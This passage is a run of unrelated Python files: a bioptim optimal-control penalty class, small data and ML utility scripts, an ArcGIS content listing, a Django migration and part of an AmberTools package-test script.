If the function returns, all is okay
_set_penalty_function(self, all_pn: Union[PenaltyNodeList, list, tuple], fcn: Union[MX, SX])
Finalize the preparation of the penalty (setting function and weighted_function)
add_target_to_plot(self, all_pn: PenaltyNodeList, combine_to: str)
Interface to the plot so it can be properly added to the proper plot
_finish_add_target_to_plot(self, all_pn: PenaltyNodeList)
Internal interface to add (after having check the target dimensions) the target to the plot if needed
add_or_replace_to_penalty_pool(self, ocp, nlp)
Doing some configuration on the penalty and add it to the list of penalty
_add_penalty_to_pool(self, all_pn: PenaltyNodeList)
Return the penalty pool for the specified penalty (abstract)
clear_penalty(self, ocp, nlp)
Resets a penalty. A negative penalty index creates a new empty penalty (abstract)
_get_penalty_node_list(self, ocp, nlp) -> PenaltyNodeList
Get the actual node (time, X and U) specified in the penalty
"""
def __init__(
self,
penalty: Any,
phase: int = 0,
node: Union[Node, list, tuple] = Node.DEFAULT,
target: Union[int, float, np.array, list[int], list[float], list[np.array]] = None,
quadratic: bool = None,
weight: float = 1,
derivative: bool = False,
explicit_derivative: bool = False,
integrate: bool = False,
integration_rule: IntegralApproximation = IntegralApproximation.DEFAULT,
index: list = None,
rows: Union[list, tuple, range, np.ndarray] = None,
cols: Union[list, tuple, range, np.ndarray] = None,
states_mapping: BiMapping = None,
custom_function: Callable = None,
constraint_type: ConstraintType = ConstraintType.USER,
multi_thread: bool = None,
expand: bool = False,
**params: Any,
):
"""
Parameters
----------
penalty: PenaltyType
The actual penalty
phase: int
The phase the penalty is acting on
node: Union[Node, list, tuple]
The node within a phase on which the penalty is acting on
target: Union[int, float, np.array, list[int], list[float], list[np.array]]
A target to track for the penalty
quadratic: bool
If the penalty is quadratic
weight: float
The weighting applied to this specific penalty
derivative: bool
If the function should be evaluated at X and X+1
explicit_derivative: bool
If the function should be evaluated at [X, X+1]
integrate: bool
If the function should be integrated
integration_rule: IntegralApproximation
The rule to use for the integration
index: int
The component index the penalty is acting on
custom_function: Callable
A user defined function to call to get the penalty
constraint_type: ConstraintType
If the penalty is from the user or from bioptim (implicit or internal)
**params: dict
Generic parameters for the penalty
"""
super(PenaltyOption, self).__init__(phase=phase, type=penalty, **params)
self.node: Union[Node, list, tuple] = node
self.quadratic = quadratic
self.integration_rule = integration_rule
if index is not None and rows is not None:
raise ValueError("rows and index cannot be defined simultaneously since they are the same variable")
self.rows = rows if rows is not None else index
self.cols = cols
self.expand = expand
self.target = None
if target is not None:
target = np.array(target)
if isinstance(target, int) or isinstance(target, float) or isinstance(target, np.ndarray):
target = [target]
self.target = []
for t in target:
self.target.append(np.array(t))
if len(self.target[-1].shape) == 0:
self.target[-1] = self.target[-1][np.newaxis]
if len(self.target[-1].shape) == 1:
self.target[-1] = self.target[-1][:, np.newaxis]
if len(self.target) == 1 and (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
):
if self.node == Node.ALL or self.node == Node.DEFAULT:
self.target = [self.target[0][:, :-1], self.target[0][:, 1:]]
else:
                    raise NotImplementedError(
                        f"A list of 2 elements is required with {self.node} and TRAPEZOIDAL integration, "
                        "except for Node.ALL and Node.DEFAULT, "
                        "which can be automatically generated"
                    )
self.target_plot_name = None
self.target_to_plot = None
# todo: not implemented yet for trapezoidal integration
self.plot_target = (
False
if (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
)
else True
)
self.states_mapping = states_mapping
self.custom_function = custom_function
self.node_idx = []
self.dt = 0
self.weight = weight
self.function: Union[Function, None] = None
self.function_non_threaded: Union[Function, None] = None
self.weighted_function: Union[Function, None] = None
self.weighted_function_non_threaded: Union[Function, None] = None
self.derivative = derivative
self.explicit_derivative = explicit_derivative
self.integrate = integrate
self.transition = False
self.multinode_constraint = False
self.phase_pre_idx = None
self.phase_post_idx = None
if self.derivative and self.explicit_derivative:
raise ValueError("derivative and explicit_derivative cannot be both True")
self.constraint_type = constraint_type
self.multi_thread = multi_thread
def set_penalty(self, penalty: Union[MX, SX], all_pn: PenaltyNodeList):
"""
Prepare the dimension and index of the penalty (including the target)
Parameters
----------
penalty: Union[MX, SX],
The actual penalty function
all_pn: PenaltyNodeList
The penalty node elements
"""
self.rows = self._set_dim_idx(self.rows, penalty.rows())
self.cols = self._set_dim_idx(self.cols, penalty.columns())
if self.target is not None:
self._check_target_dimensions(all_pn, len(all_pn.t))
if self.plot_target:
self._finish_add_target_to_plot(all_pn)
self._set_penalty_function(all_pn, penalty)
self._add_penalty_to_pool(all_pn)
def _set_dim_idx(self, dim: Union[list, tuple, range, np.ndarray], n_rows: int):
"""
Checks if the variable index is consistent with the requested variable.
Parameters
----------
dim: Union[list, tuple, range]
The dimension to set
n_rows: int
The expected row shape
Returns
-------
The formatted indices
"""
if dim is None:
dim = range(n_rows)
else:
if isinstance(dim, int):
dim = [dim]
if max(dim) > n_rows:
raise RuntimeError(f"{self.name} index cannot be higher than nx ({n_rows})")
dim = np.array(dim)
if not np.issubdtype(dim.dtype, np.integer):
raise RuntimeError(f"{self.name} index must be a list of integer")
return dim
def _check_target_dimensions(self, all_pn: PenaltyNodeList, n_time_expected: int):
"""
Checks if the variable index is consistent with the requested variable.
If the function returns, all is okay
Parameters
----------
all_pn: PenaltyNodeList
The penalty node elements
n_time_expected: Union[list, tuple]
The expected shape (n_rows, ns) of the data to track
"""
if self.integration_rule == IntegralApproximation.RECTANGLE:
n_dim = len(self.target[0].shape)
if n_dim != 2 and n_dim != 3:
raise RuntimeError(
f"target cannot be a vector (it can be a matrix with time dimension equals to 1 though)"
)
if self.target[0].shape[-1] == 1:
self.target = np.repeat(self.target, n_time_expected, axis=-1)
shape = (
(len(self.rows), n_time_expected) if n_dim == 2 else (len(self.rows), len(self.cols), n_time_expected)
)
if self.target[0].shape != shape:
raise RuntimeError(
f"target {self.target[0].shape} does not correspond to expected size {shape} for penalty {self.name}"
)
# If the target is on controls and control is constant, there will be one value missing
if all_pn is not None:
if (
all_pn.nlp.control_type == ControlType.CONSTANT
and all_pn.nlp.ns in all_pn.t
and self.target[0].shape[-1] == all_pn.nlp.ns
):
if all_pn.t[-1] != all_pn.nlp.ns:
raise NotImplementedError("Modifying target for END not being last is not implemented yet")
self.target[0] = np.concatenate(
(self.target[0], np.nan * np.zeros((self.target[0].shape[0], 1))), axis=1
)
        elif (
            self.integration_rule == IntegralApproximation.TRAPEZOIDAL
            or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
        ):
target_dim = len(self.target)
if target_dim != 2:
raise RuntimeError(f"targets with trapezoidal integration rule need to get a list of two elements.")
for target in self.target:
n_dim = len(target.shape)
if n_dim != 2 and n_dim != 3:
raise RuntimeError(
f"target cannot be a vector (it can be a matrix with time dimension equals to 1 though)"
)
if target.shape[-1] == 1:
target = np.repeat(target, n_time_expected, axis=-1)
shape = (
(len(self.rows), n_time_expected - 1)
if n_dim == 2
else (len(self.rows), len(self.cols), n_time_expected - 1)
)
for target in self.target:
if target.shape != shape:
raise RuntimeError(
f"target {target.shape} does not correspond to expected size {shape} for penalty {self.name}"
)
# If the target is on controls and control is constant, there will be one value missing
if all_pn is not None:
if (
all_pn.nlp.control_type == ControlType.CONSTANT
and all_pn.nlp.ns in all_pn.t
and self.target[0].shape[-1] == all_pn.nlp.ns - 1
and self.target[1].shape[-1] == all_pn.nlp.ns - 1
):
if all_pn.t[-1] != all_pn.nlp.ns:
raise NotImplementedError("Modifying target for END not being last is not implemented yet")
self.target = np.concatenate((self.target, np.nan * np.zeros((self.target.shape[0], 1))), axis=1)
def _set_penalty_function(self, all_pn: Union[PenaltyNodeList, list, tuple], fcn: Union[MX, SX]):
"""
Finalize the preparation of the penalty (setting function and weighted_function)
Parameters
----------
all_pn: PenaltyNodeList
The nodes
fcn: Union[MX, SX]
The value of the penalty function
"""
# Sanity checks
if self.transition and self.explicit_derivative:
raise ValueError("transition and explicit_derivative cannot be true simultaneously")
if self.transition and self.derivative:
raise ValueError("transition and derivative cannot be true simultaneously")
if self.derivative and self.explicit_derivative:
raise ValueError("derivative and explicit_derivative cannot be true simultaneously")
def get_u(nlp, u: Union[MX, SX], dt: Union[MX, SX]):
"""
Get the control at a given time
Parameters
----------
nlp: NonlinearProgram
The nonlinear program
u: Union[MX, SX]
The control matrix
dt: Union[MX, SX]
The time a which control should be computed
Returns
-------
The control at a given time
"""
if nlp.control_type == ControlType.CONSTANT:
return u
elif nlp.control_type == ControlType.LINEAR_CONTINUOUS:
return u[:, 0] + (u[:, 1] - u[:, 0]) * dt
else:
raise RuntimeError(f"{nlp.control_type} ControlType not implemented yet")
return u
if self.multinode_constraint or self.transition:
ocp = all_pn[0].ocp
nlp = all_pn[0].nlp
nlp_post = all_pn[1].nlp
name = self.name.replace("->", "_").replace(" ", "_").replace(",", "_")
states_pre = nlp.states.cx_end
states_post = nlp_post.states.cx
controls_pre = nlp.controls.cx_end
controls_post = nlp_post.controls.cx
state_cx = vertcat(states_pre, states_post)
control_cx = vertcat(controls_pre, controls_post)
else:
ocp = all_pn.ocp
nlp = all_pn.nlp
name = self.name
if self.integrate:
state_cx = horzcat(*([all_pn.nlp.states.cx] + all_pn.nlp.states.cx_intermediates_list))
control_cx = all_pn.nlp.controls.cx
else:
state_cx = all_pn.nlp.states.cx
control_cx = all_pn.nlp.controls.cx
if self.explicit_derivative:
if self.derivative:
raise RuntimeError("derivative and explicit_derivative cannot be simultaneously true")
state_cx = horzcat(state_cx, all_pn.nlp.states.cx_end)
control_cx = horzcat(control_cx, all_pn.nlp.controls.cx_end)
param_cx = nlp.cx(nlp.parameters.cx)
# Do not use nlp.add_casadi_func because all functions must be registered
sub_fcn = fcn[self.rows, self.cols]
self.function = biorbd.to_casadi_func(name, sub_fcn, state_cx, control_cx, param_cx, expand=self.expand)
self.function_non_threaded = self.function
if self.derivative:
state_cx = horzcat(all_pn.nlp.states.cx_end, all_pn.nlp.states.cx)
control_cx = horzcat(all_pn.nlp.controls.cx_end, all_pn.nlp.controls.cx)
self.function = biorbd.to_casadi_func(
f"{name}",
self.function(all_pn.nlp.states.cx_end, all_pn.nlp.controls.cx_end, param_cx)
- self.function(all_pn.nlp.states.cx, all_pn.nlp.controls.cx, param_cx),
state_cx,
control_cx,
param_cx,
)
dt_cx = nlp.cx.sym("dt", 1, 1)
is_trapezoidal = (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
)
target_shape = tuple(
[
len(self.rows),
len(self.cols) + 1 if is_trapezoidal else len(self.cols),
]
)
target_cx = nlp.cx.sym("target", target_shape)
weight_cx = nlp.cx.sym("weight", 1, 1)
exponent = 2 if self.quadratic and self.weight else 1
if is_trapezoidal:
# Hypothesis: the function is continuous on states
# it neglects the discontinuities at the beginning of the optimization
state_cx = (
horzcat(all_pn.nlp.states.cx, all_pn.nlp.states.cx_end)
if self.integration_rule == IntegralApproximation.TRAPEZOIDAL
else all_pn.nlp.states.cx
)
# to handle piecewise constant in controls we have to compute the value for the end of the interval
# which only relies on the value of the control at the beginning of the interval
control_cx = (
horzcat(all_pn.nlp.controls.cx)
if nlp.control_type == ControlType.CONSTANT
else horzcat(all_pn.nlp.controls.cx, all_pn.nlp.controls.cx_end)
)
control_cx_end = get_u(nlp, control_cx, dt_cx)
state_cx_end = (
all_pn.nlp.states.cx_end
if self.integration_rule == IntegralApproximation.TRAPEZOIDAL
else nlp.dynamics[0](x0=state_cx, p=control_cx_end, params=nlp.parameters.cx)["xf"]
)
self.modified_function = biorbd.to_casadi_func(
f"{name}",
(
(self.function(all_pn.nlp.states.cx, all_pn.nlp.controls.cx, param_cx) - target_cx[:, 0])
** exponent
+ (self.function(state_cx_end, control_cx_end, param_cx) - target_cx[:, 1]) ** exponent
)
/ 2,
state_cx,
control_cx,
param_cx,
target_cx,
dt_cx,
)
modified_fcn = self.modified_function(state_cx, control_cx, param_cx, target_cx, dt_cx)
else:
modified_fcn = (self.function(state_cx, control_cx, param_cx) - target_cx) ** exponent
modified_fcn = weight_cx * modified_fcn * dt_cx if self.weight else modified_fcn * dt_cx
# Do not use nlp.add_casadi_func because all of them must be registered
self.weighted_function = Function(
name, [state_cx, control_cx, param_cx, weight_cx, target_cx, dt_cx], [modified_fcn]
)
self.weighted_function_non_threaded = self.weighted_function
if ocp.n_threads > 1 and self.multi_thread and len(self.node_idx) > 1:
self.function = self.function.map(len(self.node_idx), "thread", ocp.n_threads)
self.weighted_function = self.weighted_function.map(len(self.node_idx), "thread", ocp.n_threads)
else:
self.multi_thread = False # Override the multi_threading, since only one node is optimized
if self.expand:
self.function = self.function.expand()
self.weighted_function = self.weighted_function.expand()
def add_target_to_plot(self, all_pn: PenaltyNodeList, combine_to: str):
"""
Interface to the plot so it can be properly added to the proper plot
Parameters
----------
all_pn: PenaltyNodeList
The penalty node elements
combine_to: str
The name of the underlying plot to combine the tracking data to
"""
if self.target is None or combine_to is None:
return
self.target_plot_name = combine_to
# if the target is n x ns, we need to add a dimension (n x ns + 1) to make it compatible with the plot
if self.target[0].shape[1] == all_pn.nlp.ns:
self.target_to_plot = np.concatenate(
(self.target[0], np.nan * np.ndarray((self.target[0].shape[0], 1))), axis=1
)
else:
self.target_to_plot = self.target[0]
def _finish_add_target_to_plot(self, all_pn: PenaltyNodeList):
"""
Internal interface to add (after having check the target dimensions) the target to the plot if needed
Parameters
----------
all_pn: PenaltyNodeList
The penalty node elements
"""
def plot_function(t, x, u, p):
if isinstance(t, (list, tuple)):
return self.target_to_plot[:, [self.node_idx.index(_t) for _t in t]]
else:
return self.target_to_plot[:, self.node_idx.index(t)]
if self.target_to_plot is not None:
if self.target_to_plot.shape[1] > 1:
plot_type = PlotType.STEP
else:
plot_type = PlotType.POINT
all_pn.ocp.add_plot(
self.target_plot_name,
plot_function,
color="tab:red",
plot_type=plot_type,
phase=all_pn.nlp.phase_idx,
axes_idx=Mapping(self.rows),
node_idx=self.node_idx,
)
def add_or_replace_to_penalty_pool(self, ocp, nlp):
"""
Performs some configuration on the penalty and adds it to the penalty pool
Parameters
----------
ocp: OptimalControlProgram
A reference to the ocp
nlp: NonLinearProgram
A reference to the current phase of the ocp
"""
if not self.name:
if self.type.name == "CUSTOM":
self.name = self.custom_function.__name__
else:
self.name = self.type.name
penalty_type = self.type.get_type()
if self.node == Node.TRANSITION:
all_pn = []
# Make sure the penalty behaves like a PhaseTransition, even though it may be an Objective or Constraint
self.node = Node.END
self.node_idx = [0]
self.transition = True
self.dt = 1
self.phase_pre_idx = nlp.phase_idx
self.phase_post_idx = (nlp.phase_idx + 1) % ocp.n_phases
if not self.states_mapping:
self.states_mapping = BiMapping(range(nlp.states.shape), range(nlp.states.shape))
all_pn.append(self._get_penalty_node_list(ocp, nlp))
all_pn[0].u = [nlp.U[-1]] # Make an exception to the fact that U is not available for the last node
nlp = ocp.nlp[(nlp.phase_idx + 1) % ocp.n_phases]
self.node = Node.START
all_pn.append(self._get_penalty_node_list(ocp, nlp))
self.node = Node.TRANSITION
penalty_type.validate_penalty_time_index(self, all_pn[0])
penalty_type.validate_penalty_time_index(self, all_pn[1])
self.clear_penalty(ocp, all_pn[0].nlp)
elif isinstance(self.node, tuple) and self.multinode_constraint:
all_pn = []
self.node_list = self.node
# Make sure the penalty behaves like a MultinodeConstraint, even though it may be an Objective or Constraint
# self.transition = True
self.dt = 1
# self.phase_pre_idx
# self.phase_post_idx = (nlp.phase_idx + 1) % ocp.n_phases
if not self.states_mapping:
self.states_mapping = BiMapping(range(nlp.states.shape), range(nlp.states.shape))
self.node = self.node_list[0]
nlp = ocp.nlp[self.phase_first_idx]
all_pn.append(self._get_penalty_node_list(ocp, nlp))
if self.node == Node.END:
all_pn[0].u = [nlp.U[-1]]
# Make an exception to the fact that U is not available for the last node
self.node = self.node_list[1]
nlp = ocp.nlp[self.phase_second_idx]
all_pn.append(self._get_penalty_node_list(ocp, nlp))
if self.node == Node.END:
all_pn[1].u = [nlp.U[-1]]
# Make an exception to the fact that U is not available for the last node
# reset the node list
self.node = self.node_list
penalty_type.validate_penalty_time_index(self, all_pn[0])
penalty_type.validate_penalty_time_index(self, all_pn[1])
self.node_idx = [all_pn[0].t[0], all_pn[1].t[0]]
self.clear_penalty(ocp, all_pn[0].nlp)
else:
all_pn = self._get_penalty_node_list(ocp, nlp)
penalty_type.validate_penalty_time_index(self, all_pn)
self.clear_penalty(all_pn.ocp, all_pn.nlp)
self.dt = penalty_type.get_dt(all_pn.nlp)
self.node_idx = (
all_pn.t[:-1]
if (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
)
and self.target is not None
else all_pn.t
)
penalty_function = self.type.value[0](self, all_pn, **self.params)
self.set_penalty(penalty_function, all_pn)
def _add_penalty_to_pool(self, all_pn: PenaltyNodeList):
"""
Return the penalty pool for the specified penalty (abstract)
Parameters
----------
all_pn: PenaltyNodeList
The penalty node elements
"""
raise RuntimeError("get_dt cannot be called from an abstract class")
def clear_penalty(self, ocp, nlp):
"""
Resets a penalty. A negative penalty index creates a new empty penalty (abstract)
Parameters
----------
ocp: OptimalControlProgram
A reference to the ocp
nlp: NonLinearProgram
A reference to the current phase of the ocp
"""
raise RuntimeError("_reset_penalty cannot be called from an abstract class")
def _get_penalty_node_list(self, ocp, nlp) -> PenaltyNodeList:
"""
Get the actual node (time, X and U) specified in the penalty
Parameters
----------
ocp: OptimalControlProgram
A reference to the ocp
nlp: NonLinearProgram
A reference to the current phase of the ocp
Returns
-------
The actual node (time, X and U) specified in the penalty
"""
if not isinstance(self.node, (list, tuple)):
self.node = (self.node,)
t = []
for node in self.node:
if isinstance(node, int):
if node < 0 or node > nlp.ns:
raise RuntimeError(f"Invalid node, {node} must be between 0 and {nlp.ns}")
t.append(node)
elif node == Node.START:
t.append(0)
elif node == Node.MID:
if nlp.ns % 2 == 1:
raise (ValueError("Number of shooting points must be even to use MID"))
t.append(nlp.ns // 2)
elif node == Node.INTERMEDIATES:
t.extend(range(1, nlp.ns - 1))
elif node == Node.PENULTIMATE:
if nlp.ns < 2:
raise (ValueError("Number of shooting points must be greater than 1"))
t.append(nlp.ns - 1)
elif node == Node.END:
t.append(nlp.ns)
elif node == Node.ALL_SHOOTING:
t.extend(range(nlp.ns))
elif node == Node.ALL:
t.extend(range(nlp.ns + 1))
else:
raise RuntimeError(" is not a valid node")
x = [nlp.X[idx] for idx in t]
u = [nlp.U[idx] for idx in t if idx != nlp.ns]
return PenaltyNodeList(ocp, nlp, t, x, u, nlp.parameters.cx)
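# Illustrative note (not part of the original file): assuming a phase with nlp.ns == 10,
# _get_penalty_node_list would resolve the Node values roughly as follows:
#   Node.START         -> t = [0]
#   Node.MID           -> t = [5]
#   Node.INTERMEDIATES -> t = [1, 2, ..., 8]
#   Node.PENULTIMATE   -> t = [9]
#   Node.END           -> t = [10]
#   Node.ALL_SHOOTING  -> t = [0, 1, ..., 9]
#   Node.ALL           -> t = [0, 1, ..., 10]
# u is only collected for indices below nlp.ns, since no control exists at the final node.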
|
#! /usr/bin/env python
# -*- mode: python; coding: utf-8 -*-
# Copyright (c) 2018 Radio Astronomy Software Group
# Licensed under the 2-clause BSD License
from __future__ import absolute_import, division, print_function
import argparse
import os.path as op
from pyuvdata import UVData
parser = argparse.ArgumentParser()
parser.add_argument('uvfits_read',
help='name of a uvfits file to read in')
parser.add_argument('uvfits_write',
help='name of a uvfits file to write out')
args = parser.parse_args()
uvfits_file_in = args.uvfits_read
if not op.isfile(uvfits_file_in):
raise IOError('There is no file named {}'.format(uvfits_file_in))
uvfits_file_out = args.uvfits_write
this_uv = UVData()
this_uv.read_uvfits(uvfits_file_in)
this_uv.write_uvfits(uvfits_file_out)
del this_uv
|
import torch
from torch.utils.data import DataLoader, Dataset
from tqdm import tqdm
class Simple_Trans(Dataset):
def __init__(self, data, transform=None):
# [reps, labels]
self.reps = data[0]
self.labels = data[1]
# print(self.reps.shape, self.labels.shape) # torch.Size([60000, 64]) torch.Size([60000])
def __len__(self):
return self.labels.shape[0]
def __getitem__(self, idx):
return self.reps[idx, :], self.labels[idx]
class linear_clf(object):
def __init__(self, net, classifier, optimizer, train_dataloader, test_dataloader, device = "cpu", batch_size=1024,
num_epochs = 10, disable_tqdm = False, writer=None, writer_tag = "", pair=False):
self.net = net
#self.net.eval()
self.classifier = classifier
self.optimizer = optimizer
self.writer = writer
self.tag = writer_tag
self.disable_tqdm = disable_tqdm
self.device = device
self.batch_size = batch_size
self.num_epochs = num_epochs
self.data_train = Simple_Trans(self.compute_representations(train_dataloader))
self.data_test = Simple_Trans(self.compute_representations(test_dataloader))
self.best_number = 0
self.train_linear_layer()
self.train_acc = self.compute_accuracy(DataLoader(self.data_train, batch_size=batch_size))
self.test_acc = self.compute_accuracy(DataLoader(self.data_test, batch_size=batch_size))
#self.net.train()
def compute_representations(self, dataloader):
""" store the representations
:param net: ResNet or smth
:param dataloader: train_loader and test_loader
"""
#self.net.eval()
reps, labels = [], []
for i, (x, label) in enumerate(dataloader):
# load data
x = x.to(self.device)
labels.append(label)
# forward
with torch.no_grad():
representation = self.net(x)
reps.append(representation.detach().cpu())
# periodically merge the accumulated chunks so the Python lists stay short
if i % 100 == 0:
reps = [torch.cat(reps, dim=0)]
labels = [torch.cat(labels, dim=0)]
reps = torch.cat(reps, dim=0)
labels = torch.cat(labels, dim=0)
#self.net.train()
return [reps, labels]
def compute_accuracy(self, dataloader):
#self.net.eval()
self.classifier.eval()
right = []
total = []
for x, label in dataloader:
x, label = x.to(self.device), label.to(self.device)
# feed to network and classifier
with torch.no_grad():
pred_logits = self.classifier(x)
# compute accuracy
_, pred_class = torch.max(pred_logits, 1)
right.append((pred_class == label).sum().item())
total.append(label.size(0))
self.classifier.train()
#self.net.train()
return sum(right) / sum(total)
def train_linear_layer(self):
#self.net.eval()
class_criterion = torch.nn.CrossEntropyLoss()
progress_bar = tqdm(range(self.num_epochs), disable=self.disable_tqdm, position=0, leave=True)
for epoch in progress_bar:
for x, label in DataLoader(self.data_train, batch_size=self.batch_size):
self.classifier.train()
x, label = x.to(self.device), label.to(self.device)
pred_class = self.classifier(x)
loss = class_criterion(pred_class, label)
# backward
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
curr_number = self.compute_accuracy(DataLoader(self.data_test, batch_size=self.batch_size))
if curr_number >= self.best_number:
self.best_number = curr_number
if self.writer is not None:
self.writer.log_metrics({'CLFtraining/val-tag{}'.format(self.tag): curr_number}, step = epoch)
progress_bar.set_description('Linear_CLF Epoch: [{}/{}] Acc@1:{:.3f}% BestAcc@1:{:.3f}%'
.format(epoch, self.num_epochs, curr_number, self.best_number))
#self.net.train()
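# Minimal usage sketch (an assumption, not part of the original file). `encoder`,
# `train_loader` and `test_loader` are hypothetical: any frozen feature extractor producing
# 64-d representations plus two image dataloaders would do.
#
# encoder = MyPretrainedEncoder().eval().to("cuda")
# probe = torch.nn.Linear(64, 10).to("cuda")
# optimizer = torch.optim.Adam(probe.parameters(), lr=1e-3)
# clf = linear_clf(encoder, probe, optimizer, train_loader, test_loader,
#                  device="cuda", batch_size=1024, num_epochs=10)
# print(clf.train_acc, clf.test_acc)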
|
# Import libraries
from arcgis import gis
import logging
import json
secrets = r"H:\secrets\maphub_config.json"
def readConfig(configFile):
"""
Reads the JSON config file and returns a list of site parameter
dictionaries, each identified by a 'name' key.
"""
logging.debug("Loading config")
with open(configFile) as json_file:
try:
d = json.load(json_file)
except ValueError:
logging.error("failed to parse configuration")
return None
logging.debug("Config loaded")
return d
sites = readConfig(secrets)
for site in sites:
if site['name'].lower() == 'bc maphub':
params = site['params']
mh = gis.GIS(params['mapurl'],params['usr'],params['password'])
contents = mh.content.search(query="owner:{}".format(params['usr']))
for item in contents:
print (f"Name:{item['name']} Id: {item['id']}")
|
from datetime import datetime
from datetime import date
date_format = "%m/%d/%Y"
def comparedate(start, end, now):
a = datetime.strptime(start, date_format)
b = datetime.strptime(now, date_format)
c = datetime.strptime(end, date_format)
delta1 = b - a
delta2 = c - b
delta3 = a - a
days = c - a
print(days)
# fare is charged at 50 per day between start and end
fare = days.days * 50
print(fare)
'''if delta1.days >= delta3.days and delta2.days >= delta3.days:
return True
else:
return False
'''
now=date.today().strftime(date_format)
start='9/1/2019'
end='12/1/2019'
comparedate(start,end,now)
'''if comparedate(start,end,now):
print("IT WORKS")
else:
print("OOPS...")'''
|
from factory import vectorizer_factory
from sklearn.base import TransformerMixin
from sklearn.pipeline import make_pipeline
from lime.lime_text import LimeTextExplainer
class VectorTransformer(TransformerMixin):
def __init__(self, vectorizer_name):
self.vectorizer_name = vectorizer_name
def fit(self, X, y=None):
# nothing to fit; return self so the transformer can be used inside a sklearn Pipeline
return self
def transform(self, sentence_list, y=None):
return vectorizer_factory.get_vectorized_text(sentence_list,self.vectorizer_name)
def get_pipeline_for_classification(feature_transformer, trained_model):
return make_pipeline(feature_transformer, trained_model)
def get_explanation_for_instance(text_string,classifier_function, class_list, max_num_features_to_show=10, file_to_save='explain.html'):
explainer = LimeTextExplainer(class_names=class_list,random_state=42)
explained_instance = explainer.explain_instance(text_string, classifier_function.predict_proba,
num_features=max_num_features_to_show, top_labels=len(class_list))
explained_instance.save_to_file(file_to_save)
return explained_instance.as_list()
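# Minimal usage sketch (an assumption, not part of the original module). `trained_model` is a
# hypothetical fitted classifier exposing predict_proba, and 'tfidf' stands for any vectorizer
# name registered with vectorizer_factory.
#
# transformer = VectorTransformer('tfidf')
# pipeline = get_pipeline_for_classification(transformer, trained_model)
# weights = get_explanation_for_instance("the delivery was quick and the product works",
#                                        pipeline, class_list=['negative', 'positive'],
#                                        max_num_features_to_show=10,
#                                        file_to_save='explain.html')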
|
from fsapi import FSAPI
URL = 'http://192.168.1.39:80/device'
PIN = 1234
TIMEOUT = 1 # in seconds
fs = FSAPI(URL, PIN, TIMEOUT)
print('Name: %s' % fs.friendly_name)
print('Mute: %s' % fs.mute)
print('Mode: %s' % fs.mode)
print('Modes: %s' % fs.modes)
print('Power: %s' % fs.power)
print('Volume steps: %s' % fs.volume_steps)
print('Volume: %s' % fs.volume)
print('Play status: %s' % fs.play_status)
print('Track name: %s' % fs.play_info_name)
print('Track text: %s' % fs.play_info_text)
print('Artist: %s' % fs.play_info_artist)
print('Album: %s' % fs.play_info_album)
print('Graphics: %s' % fs.play_info_graphics)
|
# Generated by Django 2.2.16 on 2020-10-27 09:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('organizations', '0017_add_organizationaltname'),
('scheduler', '0003_harvest'),
]
operations = [
migrations.CreateModel(
name='Automatic',
fields=[
(
'id',
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name='ID'
),
),
('month', models.DateField()),
(
'harvest',
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE, to='scheduler.Harvest'
),
),
(
'organization',
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='automatic_harvest',
to='organizations.Organization',
),
),
],
),
migrations.AddConstraint(
model_name='automatic',
constraint=models.CheckConstraint(check=models.Q(month__day=1), name='fist_month_day'),
),
migrations.AddConstraint(
model_name='automatic',
constraint=models.UniqueConstraint(
fields=('month', 'organization'), name='unique_month_organization'
),
),
]
|
import os
import sys
import subprocess
from contextlib import contextmanager
import argparse
import glob
ENV_ROOT = 'test_ambertools'
AMBER_VERSION = 'amber17'
def is_conda_package(package_dir):
basename = os.path.basename(package_dir)
return not (basename.startswith('osx') or basename.startswith('linux'))
def run_test(package_dir, amberhome, TEST_SCRIPT):
if is_conda_package(package_dir):
subprocess.check_call('bash {}'.format(TEST_SCRIPT), shell=True)
else:
subprocess.check_call(
"source {}/amber.sh && bash {}".format(amberhome, TEST_SCRIPT),
shell=True)
def install_ambertools(package_dir,
env_name,
tmp_dir='junk_folder',
pyver='2.7'):
if is_conda_package(package_dir):
# conda
subprocess.check_call(
'conda install {} -n {}'.format(package_dir, env_name), shell=True)
else:
amberhome = os.path.abspath(os.path.join(tmp_dir, AMBER_VERSION))
# non-conda
try:
os.mkdir(tmp_dir)
except OSError:
pass
os.chdir(tmp_dir)
if os.path.exists(AMBER_VERSION):
print("Existing {}. Skip untar".format(AMBER_VERSION))
else:
subprocess.check_call(['tar', '-xf', package_dir])
# os.environ['AMBERHOME'] = amberhome
# os.environ['PYTHONPATH'] = os.path.join(amberhome,
# 'lib/python{}/site-packages'.format(pyver))
# os.environ['PATH'] = os.path.join(amberhome, 'bin') + ':' + os.getenv("PATH")
def find_miniconda_root():
command = "conda info --base"
return subprocess.check_output(command, shell=True).decode().strip()
def create_env(env, python_version):
sys.stdout.write('creating {} env\n'.format(env))
cmlist = 'conda create -n {} python={} numpy nomkl --yes'.format(
env, python_version)
print(cmlist)
subprocess.check_call(cmlist.split())
@contextmanager
def run_env(env_name, python_version):
os.environ['PYTHONPATH'] = ''
ORIG_PATH = os.environ['PATH']
env_path = find_miniconda_root() + '/envs/' + env_name
env_bin_dir = env_path + '/bin/'
os.environ['CONDA_PREFIX'] = env_path
os.environ['PATH'] = env_bin_dir + ':' + ORIG_PATH
if not os.path.exists(find_miniconda_root() + '/envs/' + env_name):
create_env(env_name, python_version)
os.system('source activate {}'.format(env_name))
yield
os.system('conda env remove -n {} -y'.format(env_name))
os.environ['PATH'] = ORIG_PATH
def ensure_no_gfortran_local(amberhome):
errors = []
for fn in get_tested_files(amberhome):
cmd = ['otool', '-L', fn]
try:
output = subprocess.check_output(
cmd, stderr=subprocess.PIPE).decode()
except subprocess.CalledProcessError:
output = ''
if '/usr/local/gfortran' in output:
errors.append(fn)
return errors
def get_so_files(dest):
